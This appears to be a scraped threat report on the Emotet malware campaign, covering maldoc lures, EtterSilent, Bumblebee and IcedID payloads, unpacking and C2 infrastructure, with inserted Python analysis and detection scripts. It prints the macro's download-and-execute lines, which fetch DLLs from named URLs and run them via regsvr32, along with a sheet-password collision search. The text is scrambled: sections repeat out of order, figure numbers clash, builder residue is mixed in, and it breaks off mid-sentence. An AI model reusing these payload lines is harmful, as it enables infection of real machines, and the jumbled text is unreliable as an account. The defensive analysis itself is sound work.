Furthermore, Emotet uses a hard-coded (ECDSA) public key for data validation.\r\nFrom the studied unpacked sample, we could retrieve the following information:\r\nECDH:MFkwEwYHKoZIzj0CAQYIKoZIzj0DAQcDQgAE86M1tQ4uK/Q1Vs0KTCk+fPEQ3cuwTyCz+gIgzky2DB5Elr60DubJW5q9Tr2dj8/gEFs0TII\r\nECDSA:\r\nMFkwEwYHKoZIzj0CAQYIKoZIzj0DAQcDQgAEQF90tsTY3Aw9HwZ6N9y5+be9XoovpqHyD6F5DRTl9THosAoePIs/e5AdJiYxhmV8Gq3Zw1ysSP\r\nInfrastructure\r\nThe configurations vary according to the samples and allow us to identify which payload is .\r\nWe cross-referenced these addresses with the command-and-control servers referenced on Feodo Tracker. Some were still\r\nactive while others had been disconnected after being publicly reported. The configurations contained IP addresses\r\nassociated with specific ports (TCP ports like 80 (http) or 443 (https), or on different ports (8080, 7080, …)).\r\nAfter a careful analysis of which service listing on such ports communicate with the payloads, we systematically found a\r\nnginx proxy server. This was deduced from the response headers returned from a simple get request method to fetch data.\r\nWhile trying to find a differentiating element on these servers, we noticed a certain similarity: most of those servers exposed\r\nlegitimate web services next to the service used for command \u0026 control on a different port. These commonalities are\r\nsummarized in two Maltego graphs depicted in Figure 23 and Figure 24.\r\n%22%22\r\nFigure 24 Maltego graph of Emotet’s epoch 4 C2 proxies with legitimate services impacted by vulnerabilities.\r\n%22%22\r\nFigure 25 Maltego graph of Emotet’s epoch 5 C2 proxies with legitimate services and vulnerabilities.\r\nIn addition to exposing legitimate web services, all these servers have numerous vulnerabilities according to Shodan. 
We\r\nconcluded, with a moderate level of confidence, that these servers have limited security and may have been compromised.\r\nConclusion\r\nThe present report provides a straight-forward and up-to-date analysis of the ongoing Emotet campaign, presently\r\ndistributing hundreds of thousands of emails per day. This investigation highlights notable changes in the modus operandi of\r\nEmotet’s operators (TA545), such as new ways to social engineer its victims to execute malicious documents used to deploy\r\nEmotet. Beyond these new methods leveraged by Emotet for initial access, the present report suggests that the change in the\r\nobfuscation technique of the main payload does not hinder an easy extraction of the configuration of the malware. This\r\nshows that Emotet’s developers may not understand how modern decompilers actually work. We also showed that since its\r\nreturn, Emotet has been seen dropping IcedID and Bumblebee malwares via Epoch 4 botnets. We anticipate that further\r\nvariants and techniques will surface in the future with fewer or greater volumes of spam.\r\nThe present report also provides several tips to analyze the whole attack chain leveraged by Emotet as well as some\r\nrecommendations to defend against it.\r\nActionable content\r\nAs we have seen in the main text, Emotet spreaders were forced to adapt and now try to lure users by attempting them to\r\ncopy the maldoc into a whitelisted directory path on the disk. We recommend monitoring any execution of XLS files arising\r\nfrom those directories. It is also recommended to make employees aware of this new technique via sensibilization training\r\nsessions and simulated phishing attacks.\r\nhttps://www.intrinsec.com/emotet-returns-and-deploys-loaders/\r\nPage 12 of 24\n\nEmotet is known to be highly polymorphic (i.e., the ability of code to change its identifiable features while maintaining its\r\nfunctionality) and tends to embed more and more threatening modules. 
Emotet often repacks its dropper and changes its\r\nmodules loaded to stay ahead of signature-based detection solution. Although its functionalities might not vary that much,\r\nthese changes are enough to bypass pattern-matching and footprint detection. More subtle detection (EDR, behavioral\r\nanalysis) would be required to detect the initial infection.\r\nWe draw your attention to one checker and complementary tools:\r\nA relevant free tool to defend against Emotet, which is dubbed EmoCheck, was released a while ago by the JPCERT\r\n(available here on their Github repository). This checker might be relevant particularly for forensics teams when they\r\ninvestigate workstations or servers that might have been infected by Emotet. Emocheck-ReportChecker can also be\r\nhelpful as it generates statistics out of numerous Emocheck reports\r\nAnother relevant tool named EmoKill. This program was inspired from the detection rules of Emocheck and was\r\ncompiled and shared on Github.\r\nTo draft this report, Intrinsec studied commonalities of XLS maldocs sent to Emotet’s victims as spearphishing attachments.\r\nOne common metadata that could be leveraged on VirusTotal Intel for hunting purposes goes as follow:\r\nmagic:%22CDF V2 Document, Little Endian, Os: Windows, Version 10.0, Code page: 1251, *Author: Gydar,\r\nLast Saved By: Gydar*, Name of Creating Application: Microsoft Excel, Create Time/Date: Thu Jun 04\r\n18:19:34 2015, Security: 0%22\r\nThe code page identifier 1251 refers to Windows Cyrillic-Slavic encoding, mostly used by Russians, Bulgarians, Serbians\r\nand Macedonians. 
It is also worth noting that all results of the aforementioned query on VT have the same filesize of 255 kB\r\nSeveral SIGMA detection rules could be leveraged to detect an attack by Emotet malware:\r\nDetects network connections and DNS queries initiated by Regsvr32.exe\r\nDetects various anomalies in relation to regsvr32.exe\r\nDetects New Lolbin Process by Office Applications\r\nA YARA detection rule provided by The DFIR Report\r\nTo detect all threats mentioned in this report (Emotet, IcedID, BumbleBee), defenders can also rely on relevant Abuse threat\r\nintel sources such as Feodotracker, ThreatFox and MalwareBazaar as well as the soon available Intrinsec’s IoCs feed.\r\n” content_last_edited=”on|desktop” _builder_version=”4.19.4″ _module_preset=”default” text_orientation=”justified”\r\nglobal_colors_info=”{}”]\r\nOur analysis starts with the first stage of the attack chain that uses a phishing email, more specifically a spear phishing\r\nattachment technique [T1566.001]. For this, we found and analyzed an email sent by Emotet upon a recent spam campaign\r\nthat contains a malicious document (maldoc) attached to the email (see an example in Figure 1).\r\nhttps://www.intrinsec.com/emotet-returns-and-deploys-loaders/\r\nPage 13 of 24\n\nFigure 1 An example of emails which may lead to Emotet malware infection. As extensively seen in the past TTPs of Emotet,\r\nthe latter fakes replies based on legitimate emails stolen from mail clients of Windows hosts previously infected. The Eml file\r\nof sha256: 910731579a78d2da6452bede7dfce8e1f89c285c22d8a7d40db2eafc2fcc45af was retrieved from VirusTotal.\r\nOnce the lured user opens the XLS file, a message box informs them that the document needs to be copied in a specific\r\ndirectory path to display the contents of the file (see Figure 2).\r\nEmotet spreaders are now using a new social engineering technique to coerce the user to copy the Excel file into the\r\nMicrosoft Office Templates folder before relaunching it. 
This is achieved via a fake yellow graphical ribbon pretending to be an official Microsoft warning. Because the Templates folder is considered a trusted location according to Microsoft Office policy, the malicious macro will run immediately without a security warning (see the Actionable content section for ways to preempt the threat at this stage). If you don't copy the file anywhere, it will still execute the macros as soon as you press Enable Content in the yellow security warning from Excel (not the fake one in the spreadsheet).
Figure 2 Message box displayed when opening the malicious document. As shown above, Microsoft warns the user through the functionality known as Mark of the Web (MoTW), forcing Emotet spreaders to adapt. The latter therefore added a specific message to the file, mimicking the Excel security warning (the yellow horizontal bar above the content) and indicating that, to run the file, it must be placed in the whitelisted Office Templates folder.
It is striking that Emotet so far has not migrated away from Office macros to other delivery mechanisms like ISO and LNK files. Indeed, many malware families quickly adopted this workaround following Microsoft's recent announcement that it would begin disabling macros by default in Office documents downloaded from the internet.
At the bottom of the document, one or several sheets (up to six) with apparently blank cells are usually seen, password protected as depicted in Figure 3. We expect that this technique could slightly change in the future to evade heuristic signatures.
Figure 3 Excel maldoc with sheet protection added.
If only one sheet is apparent in some encountered files, hidden sheets can be revealed with a right-click option to pursue the analysis.
The Emotet spreaders relied on sheet protection so that the user cannot view the included macro formula. However, Office sheet password protection can be broken via a well-known brute-force technique in a reasonable amount of time, or via a specific patching procedure. We retrieved the password using the first technique to reveal the cell contents and the macro content.
The password to unprotect the sheets and reveal their content is: AABABAAABBB^
Another trick to avoid analysis was to scatter the data across cells and blank it by changing the font color, as shown in Figure 4, so that the XLM macro is not directly readable.
Figure 4 Malicious macro scattered across the maldoc and hidden thanks to a white font color. Characters can be unveiled by changing the color of the cells.
Using olevba, a free Python tool, it is possible to find the cell containing the general formula that concatenates the whole command executed upon opening the Excel file (see the output below):
SHEET: Sheet6, Macrosheet
CELL:G13, =
(((((((FORMULA((((((((((((('Sheet1'!L24&'Sheet1'!L26)&'Sheet1'!L27)&'Sheet1'!L28)&'Sheet1'!L28)&'Sheet2'!F6)&'Sheet2'!N19)&'Sheet1'!F10
0
Another trick to slow down the analysis was to shrink column G in sheet 6, as shown in Figure 5.
In the present case, a defined name called "Auto_Open07457358934307593258350725798323209" was also observed.
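To show why the sheet protection described above can be broken in a reasonable amount of time, here is an added illustration, which is neither part of the Intrinsec report nor the tool the analysts used. Excel stores only a 16-bit verifier of a sheet password (the legacy derivation of MS-OFFCRYPTO section 2.3.7.1, as implemented by Apache POI and LibreOffice), so any string with the same verifier unlocks the sheet, and a search over the classic pattern of eleven 'A'/'B' characters followed by one printable character (the shape the reported password AABABAAABBB^ has) always finds one. The target verifier is computed here from the reported password rather than read from a file, so the script runs offline.

```python
from itertools import product

REPORTED_PASSWORD = "AABABAAABBB^"   # the sheet password given in the report


def _rotl15(v: int) -> int:
    """Rotate a 15-bit value left by one bit (bit 14 wraps around to bit 0)."""
    return ((v << 1) & 0x7FFF) | ((v >> 14) & 1)


def sheet_verifier(password: str) -> int:
    """Legacy Excel sheet/workbook protection verifier (MS-OFFCRYPTO 2.3.7.1,
    as implemented by Apache POI and LibreOffice). Only these 16 bits are
    stored in the file, so any string with the same verifier unlocks the sheet."""
    data = password.encode("latin-1")
    v = 0
    for ch in reversed(data):            # characters are folded in from last to first
        v = _rotl15(v) ^ ch
    v = _rotl15(v)
    v ^= len(data)
    v ^= 0xCE4B
    return v & 0xFFFF


def find_collision(target: int) -> str:
    """Search the candidate space of the classic VBA unlocker: eleven 'A'/'B'
    characters followed by one character in the range 65..126. Each A/B choice
    flips two adjacent verifier bits, so the space covers every verifier this
    derivation can produce and the search always terminates with a match."""
    for prefix in product("AB", repeat=11):
        head = "".join(prefix)
        for last in range(65, 127):
            candidate = head + chr(last)
            if sheet_verifier(candidate) == target:
                return candidate
    raise ValueError("no candidate matched")  # not reached for verifiers of this form


if __name__ == "__main__":
    target = sheet_verifier(REPORTED_PASSWORD)
    other = find_collision(target)
    print(f"verifier of {REPORTED_PASSWORD!r}: 0x{target:04X}; also produced by {other!r}")
```

The search space holds 2^11 * 62 candidates, which is why the unlocker finishes in seconds: sheet protection is an analysis speed bump, not a security control, and analysts should treat it as such when triaging a maldoc.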
This Auto_Open name automatically triggers the aforementioned formula in cell G13 when the workbook is opened (a long-known technique).
Figure 5 shows 4 pairs of commands containing de-obfuscated hardcoded URLs which will serve for the second stage of the attack:
=CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https[:]//cs.com.sg/Backup/Bk778kXNKMiH5vH/","..\oxnv1.ooccxx",0,0)
=EXEC("C:\Windows\System32\regsvr32.exe /S ..\oxnv1.ooccxx")
=CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https[:]//j2ccamionmagasin.fr/css/1Mp8y/","..\oxnv2.ooccxx",0,0)
=EXEC("C:\Windows\System32\regsvr32.exe /S ..\oxnv2.ooccxx")
=CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http[:]//atici.net/old/PkZI74DD/","..\oxnv3.ooccxx",0,0)
=EXEC("C:\Windows\System32\regsvr32.exe /S ..\oxnv3.ooccxx")
=CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http[:]//clanbaker.org/css/khhl7kT2n69n/","..\oxnv4.ooccxx",0,0)
=EXEC("C:\Windows\System32\regsvr32.exe /S ..\oxnv4.ooccxx")
In the present case, a CALL function is used to download files from those URLs and save them to disk via the URLDownloadToFileA function exported by urlmon. It is followed by an EXEC function that runs each downloaded file via the living-off-the-land binary (LOLBin) regsvr32.exe.
Four DLLs were then downloaded from those URLs.
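As an added example (not code from the report), the following script parses olevba-style formula dumps such as the eight lines above and pairs each URLDownloadToFileA call with the EXEC that runs the dropped file, so that a triage analyst gets the download URL, the local path and the LOLBin in one pass. The formulas are embedded as a constructed sample copied from Figure 5 and keep the report's defanged "[:]" notation; the LOLBIN list is an assumption made for the example.

```python
import re
from dataclasses import dataclass

# Constructed sample: the eight formulas of Figure 5 as olevba prints them.
# URLs are kept defanged ("[:]") exactly as the report lists them.
SAMPLE_FORMULAS = [
    '=CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https[:]//cs.com.sg/Backup/Bk778kXNKMiH5vH/","..\\oxnv1.ooccxx",0,0)',
    '=EXEC("C:\\Windows\\System32\\regsvr32.exe /S ..\\oxnv1.ooccxx")',
    '=CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https[:]//j2ccamionmagasin.fr/css/1Mp8y/","..\\oxnv2.ooccxx",0,0)',
    '=EXEC("C:\\Windows\\System32\\regsvr32.exe /S ..\\oxnv2.ooccxx")',
    '=CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http[:]//atici.net/old/PkZI74DD/","..\\oxnv3.ooccxx",0,0)',
    '=EXEC("C:\\Windows\\System32\\regsvr32.exe /S ..\\oxnv3.ooccxx")',
    '=CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http[:]//clanbaker.org/css/khhl7kT2n69n/","..\\oxnv4.ooccxx",0,0)',
    '=EXEC("C:\\Windows\\System32\\regsvr32.exe /S ..\\oxnv4.ooccxx")',
]

# Binaries commonly abused to run a dropped payload (assumed list); regsvr32 is the one seen here.
LOLBINS = {"regsvr32.exe", "rundll32.exe", "mshta.exe", "wscript.exe", "cscript.exe"}

QUOTED = re.compile(r'"([^"]*)"')   # XLM string arguments carry no backslash escapes


@dataclass
class Stage:
    url: str            # remote payload (defanged as given)
    dropped: str        # local path URLDownloadToFileA writes to
    exec_cmd: str = ""  # EXEC command line that runs it, if any
    lolbin: str = ""    # basename of the executed binary when it is a known LOLBin


def _basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def extract_stages(formulas):
    """Pair each CALL(urlmon, URLDownloadToFileA, ...) with the EXEC that runs
    the file it dropped, returning one Stage per download in formula order."""
    stages, pending = [], []
    for f in formulas:
        f = f.strip()
        args = QUOTED.findall(f)
        if (f.startswith("=CALL(") and len(args) >= 5
                and args[0].lower() == "urlmon" and args[1] == "URLDownloadToFileA"):
            # args: dll, export, type signature, url, destination path
            st = Stage(url=args[3], dropped=args[4])
            stages.append(st)
            pending.append(st)
        elif f.startswith("=EXEC(") and args:
            cmd = args[0]
            for st in pending:
                if st.dropped.lower() in cmd.lower():
                    st.exec_cmd = cmd
                    exe = _basename(cmd.split()[0])
                    st.lolbin = exe if exe in LOLBINS else ""
                    pending.remove(st)
                    break
    return stages


def iocs(formulas):
    """Hunting artefacts: defanged URLs, dropped file names and LOLBins used."""
    st = extract_stages(formulas)
    return {
        "urls": [s.url for s in st],
        "dropped_files": [_basename(s.dropped) for s in st],
        "lolbins": sorted({s.lolbin for s in st if s.lolbin}),
    }


if __name__ == "__main__":
    for s in extract_stages(SAMPLE_FORMULAS):
        print(f"{s.url} -> {s.dropped} -> {s.lolbin or 'no EXEC found'}")
    print(iocs(SAMPLE_FORMULAS))
```

The odd ".ooccxx" extension of the dropped files is itself a useful hunting artefact: regsvr32 does not care about the extension of the module it loads, but a legitimate COM registration almost never points at one.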
Three of the four DLLs were copied to %UserProfile%\AppData\Local with random names, in a dedicated folder that also has a random name, probably to bypass detection:
C:\Users\admin\AppData\Local\ClVoC\QrGkecuASUzF.dll
C:\Users\admin\AppData\Local\WLifsjKOOF\EUaGZqSKWcHGU.dll
C:\Users\admin\AppData\Local\WBoDkXTZxEMvgSGka\WpRogE.dll
The LOLBin regsvr32.exe is then used to execute those 4 downloaded DLLs:
Figure 6 The LOLBin regsvr32.exe is used to execute the previously downloaded DLLs.
regsvr32.exe will then communicate with a Korean IP address (182.162.143[.]56):
Figure 7 Network communications showing direct requests to one of Emotet's C2s.
This IP address belongs to the list of C2s extracted from the present sample.
As far as the persistence mechanism is concerned, access is maintained on the system by adding multiple keys to the Windows registry, which will execute the DLLs at every restart with regsvr32.exe:
Figure 8 Location paths of the DLLs are saved in the Windows registry for persistence purposes.
Each key will start regsvr32.exe at system startup to execute the DLLs.
Figure 9 Commands that will launch the DLL at the start of the computer.
All described techniques (hidden sheets, password protection, white background and characters) and the observed attack chain suggest that this campaign could be attributed to Emotet's epoch5 botnet, which leverages the SilentBuilder dropper.
EtterSilent Maldoc builder distribution
After having analysed several samples, we concluded from observed commonalities within the maldocs' metadata (see the Actionable content section) that the EtterSilent maldoc builder was leveraged for Emotet's distribution.
EtterSilent was created by a threat actor known as AshkERE on Russian-speaking underground cybercriminal forums (Exploit and XSS).
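Before turning to the builder, the regsvr32 behaviour of Figures 6 to 9 (an Office application spawning regsvr32, a module with a non-.dll extension loaded from a relative or user-writable path, regsvr32 opening a network connection, and a registry Run key pointing at it) maps directly onto the SIGMA rules listed in the Actionable content section. The script below, an added example rather than the report's or Intrinsec's own code, encodes those conditions and runs them over a handful of constructed Sysmon-like events; the DLL paths and the C2 address are those of the report, while the event layout, the parent process names, the Run key location and the destination port are assumptions made for the example.

```python
import re

# Constructed telemetry modelled on Figures 6 to 9 of the report. The DLL paths
# and the C2 address are the report's; the event layout, parent images, Run key
# location and destination port are assumed for this example.
SAMPLE_EVENTS = [
    {"type": "process", "image": r"C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE",
     "parent_image": r"C:\Windows\explorer.exe", "cmdline": '"EXCEL.EXE" /dde'},
    {"type": "process", "image": r"C:\Windows\System32\regsvr32.exe",
     "parent_image": r"C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE",
     "cmdline": r"C:\Windows\System32\regsvr32.exe /S ..\oxnv1.ooccxx"},
    {"type": "process", "image": r"C:\Windows\System32\regsvr32.exe",
     "parent_image": r"C:\Windows\System32\regsvr32.exe",
     "cmdline": r'regsvr32.exe "C:\Users\admin\AppData\Local\ClVoC\QrGkecuASUzF.dll"'},
    {"type": "network", "image": r"C:\Windows\System32\regsvr32.exe",
     "dest_ip": "182.162.143[.]56", "dest_port": 443},
    {"type": "registry", "image": r"C:\Windows\System32\regsvr32.exe",
     "key": r"HKCU\Software\Microsoft\Windows\CurrentVersion\Run\QrGkecuASUzF",
     "value": r'regsvr32.exe "C:\Users\admin\AppData\Local\ClVoC\QrGkecuASUzF.dll"'},
    # benign control: an installer registering a COM server from Program Files
    {"type": "process", "image": r"C:\Windows\System32\regsvr32.exe",
     "parent_image": r"C:\Windows\System32\msiexec.exe",
     "cmdline": r'regsvr32.exe /s "C:\Program Files\Vendor\plugin.dll"'},
]

OFFICE_APPS = {"excel.exe", "winword.exe", "powerpnt.exe", "outlook.exe"}
# user-writable or relative locations a legitimate COM registration rarely uses
USER_WRITABLE = re.compile(r"\\appdata\\|\\users\\public\\|\\temp\\|(?:^|\s)\.\.\\", re.I)
RUN_KEYS = re.compile(r"\\currentversion\\run(?:once)?\\", re.I)
ARG = re.compile(r'"([^"]*)"|(\S+)')


def _basename(path):
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def _last_arg(cmdline):
    """Last command-line argument, honouring double quotes around paths with spaces."""
    toks = [quoted or bare for quoted, bare in ARG.findall(cmdline)]
    return toks[-1] if toks else ""


def rules_for(ev):
    """Names of the behavioural rules an event matches (empty list if none)."""
    hits = []
    image = _basename(ev.get("image", ""))
    if ev["type"] == "process" and image == "regsvr32.exe":
        cmd = ev["cmdline"]
        if _basename(ev.get("parent_image", "")) in OFFICE_APPS:
            hits.append("lolbin_spawned_by_office")
        if USER_WRITABLE.search(cmd):
            hits.append("regsvr32_user_writable_path")
        target = _basename(_last_arg(cmd))
        if "." in target and not target.endswith(".dll"):
            hits.append("regsvr32_non_dll_extension")
    elif ev["type"] == "network" and image == "regsvr32.exe":
        hits.append("regsvr32_network_connection")
    elif (ev["type"] == "registry" and RUN_KEYS.search(ev["key"])
            and "regsvr32" in ev["value"].lower()):
        hits.append("run_key_regsvr32_persistence")
    return hits


def triage(events):
    """(index, matched rules) for every event that matches at least one rule."""
    out = []
    for i, ev in enumerate(events):
        hits = rules_for(ev)
        if hits:
            out.append((i, hits))
    return out


if __name__ == "__main__":
    for i, hits in triage(SAMPLE_EVENTS):
        print(i, SAMPLE_EVENTS[i]["type"], ", ".join(hits))
```

The benign msiexec event is kept in the sample on purpose: regsvr32 is a noisy binary in enterprise telemetry, and the value of these rules comes from combining parent process, path and extension rather than from alerting on regsvr32 alone.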
AshkERE appears to be the sole seller and developer of EtterSilent (even though teamwork remains possible). As a reminder, EtterSilent is a malicious document generator with embedded defence evasion techniques offering two types of weaponized Microsoft Office documents (maldocs). The most popular version seems to be the one leveraging macros, which serves many other threats such as Gozi, IcedID, Trickbot, BazarLoader and Qbot.
EtterSilent came into favour with the cybercriminal community in 2021. Although its first mention dates back to 2020, the term was really popularized on Exploit and XSS during the spring of 2021. EtterSilent was already considered at that time to be a very efficient maldoc builder with low detection rates from security tools.
Figure 10 AshkERE detailing his social network contacts in order to avoid impersonation, while confirming his presence on XSS.
The economic model seems/seemed to be built around a subscription offer, which can be purchased by members (apparently limited to five people simultaneously). The threat actor also sold the 'EtterSilent Encrypt Edition' builder so intrusion sets could operate the tool themselves, offering unlimited use of the tool for an initial price of 3000 dollars, lowered to 2500 dollars at the end of the operations (on November 30, 2021).
AshkERE is still present today with a similar username on Exploit and XSS and remains an active user even after having closed the EtterSilent sales thread.
He no longer appears to be publicly selling EtterSilent, but possibly privately.
"Links with other malwares?"
It is worth noting that an Excel document similar to the one analyzed in this report and used to spread Emotet was also observed to deliver additional malware such as Bumblebee and IcedID, two major players in the current threat landscape.
While analyzing the network traffic of such a payload during dynamic malware analysis, a communicating IP address drew our attention. We indeed noticed the previously seen Emotet C2 (182.162.143[.]56), as shown in Figure 11:
Figure 11 Excel document with sha256 199a2e0e1bb46a5dd8eb3a58aa55de157f6005c65b70245e71cecec4905cc2c0 communicating with Emotet's C2.
The Bumblebee infection started with a downloaded PowerShell script ('tps1.ps1') used to download an additional DLL ('bb.dll') associated with the malware:
Figure 12 GET request for the ps1 file that will later download the Bumblebee DLL.
The extracted config from this Bumblebee DLL reveals the following information about the malware:
Botnet ID: 0311t2
List of C2:
39.65.8[.]170:443
103.144.139[.]156:443
107.189.30[.]231:443
91.245.254[.]101:443
194.135.33[.]127:443
Bumblebee's configuration is contained inside the .data section of the binary amongst the RC4-encrypted strings.
The RC4 decryption key is hard-coded in plain text in that same section.
We then observe that once Bumblebee is executed, the infected machine communicates with a C2 (103.144.139[.]156) that was found in the list extracted from the configuration.
Figure 13 Network traffic showing a connection to one of Bumblebee's C2s.
We can also observe connections to an IP address (87.251.67[.]168) associated with the IcedID malware:
Figure 14 Network traffic showing a connection to one of IcedID's C2s.
The domain spkdeutshnewsupp[.]com resolves to this address (see Figure 15), from which we could pivot and gather additional hashes of IcedID samples (Figure 16).
Figure 15 Packet containing the domain name.
Figure 16 Detection rate (6/95) of this IP address on VirusTotal Intelligence. Several malicious payloads associated with IcedID communicate with this domain.
From a pivot on VirusTotal Intelligence we could gather additional IcedID sample hashes that communicate with this domain:
05a3a84096bcdc2a5cf87d07ede96aff7fd5037679f9585fee9a227c0d9cbf51
4e79b28215998b57d79a5272e9114eff8fc6ea3c7aac626110d18087c7d1a12b
748c98bd8fe9eaf024481251faa10a0abc631b0fb03758271526d813b57b2567
923715af8f2e49242e18210c143ffd69300cdf675f61ae33c2f2fcbab6df07e2
c58b13dc51e572ec288d97aa255d55884d7418466b8381afd1a4278a0be87427
d3d0e3512bf398aa0699fe1a57cd769fd0ef1801c110aea63c469f7632f36d50
As far as other types of threats are concerned, a recent report from Proofpoint showed that Emotet is delivering a new module that executes XMRig (the most common Monero miner).
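To illustrate the Bumblebee configuration layout described above (RC4-encrypted strings in .data with the key stored in plain text next to them), the following added example, which is neither Bumblebee's code nor the report's extractor, implements RC4 and parses a constructed stand-in for that section. The layout it assumes (a NUL-terminated key followed by a 4-byte length and the ciphertext, the config being NUL-separated strings) is an assumption made for the example and not the real binary's layout; the botnet ID and the C2 list are the values printed above, kept defanged, and the key is a made-up value.

```python
import struct

# Values printed in the report (kept defanged exactly as listed there).
BOTNET_ID = "0311t2"
C2_LIST = [
    "39.65.8[.]170:443",
    "103.144.139[.]156:443",
    "107.189.30[.]231:443",
    "91.245.254[.]101:443",
    "194.135.33[.]127:443",
]
SAMPLE_KEY = b"EXAMPLE-RC4-KEY"  # constructed for the example; not the sample's real key


def rc4(key: bytes, data: bytes) -> bytes:
    """Standard RC4: key scheduling, then the keystream XORed over the data.
    Encryption and decryption are the same operation."""
    s = list(range(256))
    j = 0
    for i in range(256):
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    out = bytearray()
    i = j = 0
    for byte in data:
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(byte ^ s[(s[i] + s[j]) & 0xFF])
    return bytes(out)


def build_data_region(key: bytes, botnet_id: str, c2s) -> bytes:
    """Constructed stand-in for the .data section (assumed layout, not the
    real binary's): plaintext key, a NUL, a 4-byte little-endian ciphertext
    length, then RC4(config) where config is NUL-terminated strings."""
    plaintext = b"".join(s.encode("ascii") + b"\x00" for s in [botnet_id, *c2s])
    ciphertext = rc4(key, plaintext)
    return key + b"\x00" + struct.pack("<I", len(ciphertext)) + ciphertext


def extract_config(region: bytes) -> dict:
    """Recover the plaintext key and the decrypted config from such a region."""
    key, rest = region.split(b"\x00", 1)
    if not key or len(rest) < 4:
        raise ValueError("no plaintext key or length field found")
    (length,) = struct.unpack_from("<I", rest, 0)
    plaintext = rc4(key, rest[4:4 + length])
    fields = [f.decode("ascii") for f in plaintext.split(b"\x00") if f]
    return {"key": key.decode("ascii"), "botnet_id": fields[0], "c2": fields[1:]}


if __name__ == "__main__":
    region = build_data_region(SAMPLE_KEY, BOTNET_ID, C2_LIST)
    print(extract_config(region))
```

Because the key sits in plain text beside the ciphertext, the whole configuration can be recovered statically once the key's offset is known, which is what makes C2 extraction from Bumblebee samples cheap enough to automate for the threat-intel feeds mentioned in the Actionable content section.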
Consequently, detecting Emotet often means that the\r\nattack is more extensive than it first appears; conversely, the detection of a coinminer or a loader should never be dismissed as an isolated event.\r\nCode Analysis of a recent Emotet sample\r\nTo better understand Emotet’s recent evolutions and new features, we performed a code analysis of a recent sample of this\r\nmalware (sha256:\r\n06b3d3c50da5054b9e37fb6c429c560484be457a09a900b21b5185cf10128ed4). First, we carried out a static analysis of the\r\nsample. The high entropy of the .text section of the binary, as depicted in Figure 17, suggests that this malware is probably\r\npacked. This is also suggested by the presence of random, unreadable strings in the sample.\r\nFigure 17 High entropy of the .text section of the binary, as viewed in the open-source tool Detect It Easy, suggests that it is probably packed.\r\nAt this stage of the analysis, the sample was loaded into the x64dbg debugger to unpack Emotet. For that purpose, a\r\nbreakpoint was set on calls to Windows APIs such as “VirtualAlloc” (memory allocation). Once this breakpoint is\r\nreached, on return from VirtualAlloc the RAX register holds the address of the newly allocated buffer; stepping on from there, the malware can be\r\nobserved writing a PE file (MZ header) into that buffer.\r\nFigure 18 Memory dump at the address held in RAX, containing the malicious Emotet PE file. Hash of the file (sha256):\r\n04c40a669fcfcd20bd429cbe4f78c71e8403ca70f804262a24024cb40dba321b\r\nOnce the binary is unpacked, we obtain the final Emotet payload, which is a 64-bit DLL.\r\nAt first glance, the static analysis of the DLL seems particularly difficult because of the heavy code obfuscation used. Simple\r\nexpressions were transformed into mathematical operations repeated multiple times. 
Sometimes the results of these\r\noperations are passed to a function that is never actually used by the program.\r\nFigure 19 Repeated mathematical operations used for obfuscation.\r\nFigure 20 Another example of those operations.\r\nThe IP addresses and ports of the C2 servers are obfuscated inside functions, each function corresponding to one specific\r\nC2. Instead of storing those constants in the code, Emotet’s developers build them through a series of arithmetic and logical operations.\r\nHowever, this obfuscation is easy to bypass since the decompiler folds those operations automatically and displays the resulting constants\r\ndirectly in the pseudocode. The effort of Emotet’s developers to hinder analysis of the malware’s\r\ncode therefore appears largely moot.\r\nFigure 21 Disassembly view (left) and pseudocode view (right) of a function returning a C2 IP address and port.\r\nThis function is referenced in a list alongside several other functions, each containing the IP address and port of another C2.\r\nFigure 22 Pointers to every function containing C2 information. The function analyzed above can be found in this list.\r\nSince Emotet chose obfuscation over encryption to hide its C2 configuration, we could simply emulate those functions, or\r\neven run them in a debugger, to retrieve the IP/port information in plain text.\r\nFor 64-bit Emotet emulation, we used “Dumpulator” to emulate the function returning the C2\r\ninformation.\r\nFigure 23 Emulation result for the given function; in this example it returns the IP address 159.65.88[.]10 and the port 8080.\r\nA further innovation of recent Emotet samples lies in the way they encrypt their network communications. 
Previously, Emotet\r\nprotected its C2 HTTP traffic with an AES symmetric key that was itself encrypted with a hard-coded RSA public key.\r\nEmotet now embeds a hard-coded Elliptic Curve Diffie-Hellman (ECDH) public key, used to agree on the symmetric key that protects the traffic. Furthermore, Emotet uses a hard-coded Elliptic Curve Digital Signature Algorithm (ECDSA) public key to validate the data it receives. Both keys are base64-encoded SubjectPublicKeyInfo structures whose common prefix identifies the NIST P-256 (prime256v1) curve. From the studied unpacked sample, we could\r\nretrieve the following information:\r\nECDH:MFkwEwYHKoZIzj0CAQYIKoZIzj0DAQcDQgAE86M1tQ4uK/Q1Vs0KTCk+fPEQ3cuwTyCz+gIgzky2DB5Elr60DubJW5q9Tr2dj8/gEFs0TII\r\nECDSA:\r\nMFkwEwYHKoZIzj0CAQYIKoZIzj0DAQcDQgAEQF90tsTY3Aw9HwZ6N9y5+be9XoovpqHyD6F5DRTl9THosAoePIs/e5AdJiYxhmV8Gq3Zw1ysSP\r\nNote that both strings are cut short as reproduced here (a complete P-256 SubjectPublicKeyInfo encodes to 124 base64 characters), so they identify the keys but cannot be decoded as printed.\r\nInfrastructure\r\nAfter extracting the configuration of several samples (see previous section), we retrieved a number of IP\r\naddresses of command-and-control servers with which the payloads communicate. The configurations vary from sample to\r\nsample, and their encryption keys allow us to identify whether a payload belongs to Epoch 4 or Epoch 5.\r\nWe cross-referenced these addresses with the command-and-control servers listed on Feodo Tracker. Some were still\r\nactive while others had been taken offline after being publicly reported. The configurations pair each IP address\r\nwith a specific TCP port: either 80 (HTTP) or 443 (HTTPS), or a non-standard port such as 8080 or 7080.\r\nAfter a careful analysis of the 